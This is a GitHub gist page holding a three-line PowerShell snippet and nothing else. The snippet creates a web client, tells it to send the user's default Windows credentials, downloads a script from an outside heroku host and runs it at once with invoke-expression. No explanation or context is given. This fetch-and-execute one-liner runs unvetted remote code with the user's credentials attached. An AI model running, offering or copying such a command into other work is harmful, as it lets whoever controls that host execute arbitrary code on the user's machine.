Skip to content

Instantly share code, notes, and snippets.

@Ang3lFir3
Created June 24, 2011 16:22
Show Gist options
  • Save Ang3lFir3/1045124 to your computer and use it in GitHub Desktop.
Save Ang3lFir3/1045124 to your computer and use it in GitHub Desktop.
$client = new-object System.Net.WebClient
$client.UseDefaultCredentials = $true
invoke-expression $client.DownloadString("http://byebye.heroku.com/byebye")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment